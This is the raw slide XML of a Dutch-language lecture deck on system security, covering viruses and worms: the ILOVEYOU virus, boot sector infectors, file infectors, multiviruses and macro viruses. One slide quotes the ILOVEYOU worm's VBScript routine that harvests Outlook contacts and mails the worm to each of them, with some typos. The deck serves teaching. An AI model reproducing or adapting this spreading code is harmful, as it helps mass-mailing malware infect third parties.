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9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78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9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9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7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9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56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0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7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4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4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1257"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Virussen en wormen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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Systeembeveiliging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0"/>
            <a:ext cx="38100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 descr="http://mixworld.do.am/troian-virus-worm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4" b="6495"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4572000" cy="289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21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Een voorbeeld ‘I love you’-virus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BE" dirty="0" smtClean="0"/>
              <a:t>Virus komt als e-mail binnen, met als onderwerp ‘I love you’ en een bijlage ‘Love-letter-for-you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.txt.vbs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Open de bijlage in je bent geinfecteerd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Virus kopieert zichzelf 3 keer op verschillende plaatsen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Past register aan, zodat bij iedere reboot het virus wordt opgestart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Leest de e-mailadressen van Outlook en stuurt dezelfde mail naar die adressen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Zoekt naar .jpg,.jpeg,.vbs,... Bestanden : verwijdert ze en laat een kopie van zichzelf achter met ongeveer dezelfde naam (evt .jpg.vbs)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0904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"/>
            <a:ext cx="8686800" cy="6858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nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>spreadtoemail()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>On Error Resume Next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regedit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = CreateObject(“Wscript.Shell”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set out = Wscript.createObject(“Outlook.application”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Set mapi = out.getNameSpace(“MAPI”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>For ctrlists=1 to mapi.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AddressLists.Count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	set a = mapi.AddressLists(ctrlists)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	x=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	regv=regedit.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;a)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	if(regv=“”) then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		regv=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	endif</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	if (int(a.AddressEntries.count)&gt;int (regv)) then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		for ctrentries = 1 to a.AddressEntries.Count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		malread = a.AddressEntries(x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		regad=“”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		regad=regedit.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;malread”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		if(regad=“”) then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>			set male=out.CreateItem(0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>male.Recipients.Add(malread)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			male.Subject=“ILOVEYOU”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			male.Body=vbcrlf&amp;”kindly check the attached loverletter coming from me.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			male.Attachments.Add(dirsystem&amp;”\Love-letter-for-you.txt.vbs”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>			male.Send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>			regedit.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;malread,1,”REG_DWORD””</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		end if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		x=x+1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		regedit.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;a,a.AddressEntries.Count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	else</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>		 regedit.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\WAB\”&amp;a,a.AddressEntries.Count</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	end if</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	next</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	Set out= Nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	Set mapi=Nothing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>End sub</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194537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70"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Boot sector infectors (BSI)</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Boot sector:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="57150" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Bevat info over de bestandsstructuur van een 		schijf: wat zich waar bevindt + extra info om te 	booten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>2 soorten Boot sectors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Master Boot Record</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Eerste sector van een storage device dat gepartitioneerd is. Bevat essentiele info over de harde schijf, zoals het startadres van zijn verschillende partities, config hardware,...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Als dit in het geheugen geladen is, kan er code aanwezig zijn om de actieve partitie te laden, en dus die partitie zijn VBR te laden </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Volume Boot Record (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Boot Sector)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>de eerste sector van een storage device</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21506" name="Picture 2" descr="http://userpages.umbc.edu/%7Edgorin1/432/viruses_files/image0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862" y="5079546"/>
            <a:ext cx="3065138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76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nl-BE" dirty="0" smtClean="0"/>
              <a:t>Boot Sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>Infector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> (BSI)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534400" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Boot Sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" b="1" i="1" dirty="0" smtClean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nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>virus op diskette (of USB) die de normale bootrecord vervangt, met zijn eigen code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Wanneer een HD geinfecteerd is, zullen alle diskettes (USB sticks) die via die PC gebruikt worden, geinfecteerd worden met deze BSI.</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22530" name="Picture 2" descr="http://userpages.umbc.edu/%7Edgorin1/432/viruses_files/image00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320143"/>
            <a:ext cx="5791200" cy="334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48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50" r="29284" b="13158"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="5117643"/>
            <a:ext cx="3429000" cy="170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Boot Sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>Infector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> (BSI)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54162"/>
            <a:ext cx="8991600" cy="3829123"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>De meeste bootsector virussen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kopieren de originele bootsectorcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>naar een andere plaats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>nadat het zijn viruscode heeft uitgevoerd, gewoon verder booten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Als een geinfecteerde diskette in de PC blijft </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-&gt; opstart </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-&gt; PC probeert te booten vanaf diskette/USB </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-&gt; laadt viruscode </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-&gt; diskette/USB is echter non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>bootable</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
              <a:t>-&gt; je krijgt dan melding dat het een non-bootable disk is, maar ondertussen is je systeem wel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>infected</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="http://image.minoc.com/zd_images/2012/44/011112_malware_main_k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77743"/>
            <a:ext cx="20574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87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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Virussen die bestanden infecteren</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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75238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= parasietvirussen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>, worden ook dikwijls wormen genoemd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Infecteren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uitvoerbare bestanden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>(.exe,.com,.dll,.bat,.scr,...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OS controleert dikwijls niet of het uitvoerbare bestand wel het juiste type is dat door de extensie wordt gesuggereerd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Prog.exe renamen als Prog.bat -&gt; programma werkt gewoon omdat het OS toch gewoon de bytecode uitvoert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Veel gebruikers laten zich dus verleiden tot het uitvoeren van zo’n bestanden (bv .scr :screensaver)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Een uitvoerbaar bestand geinfecteerd -&gt; infecteert andere bestanden als die worden uitgevoerd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Er zijn veel mogelijke uitvoerbare bestanden die geïnfecteerd kunnen worden, want telkens als je een prog start is er minstens 1 uitvoerbaar bestand dat wordt geladen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Meestal infecteert het virus niet al te veel van die bestanden, anders wordt het te gemakkelijk ontdekt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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998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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Multivirussen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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nl-BE" dirty="0" smtClean="0"/>
              <a:t>Virussen die over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>meer dan 1 infectie-mechanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>beschikken (bv. zowel bootsectors als uitvoerbare bestanden infecteren)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Is dus een </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>combi van verschillende virustypes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>Multipolar of convergent software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Software die meerdere bedreigingen vormt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" err="1" smtClean="0"/>
              <a:t>worm+bestandsvirus+trojaans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t> paard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8348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>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Macrovirussen</a:t>
            </a:r>
            <a:endParaRPr lang="nl-BE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105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>Infecteren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>macro-programmeeromgevingen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
              <a:t>= speciale vorm van bestandsvirussen:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0"/>
              <a:t>infecteren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gegevensbestanden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-BE" dirty="0" smtClean="0"/>
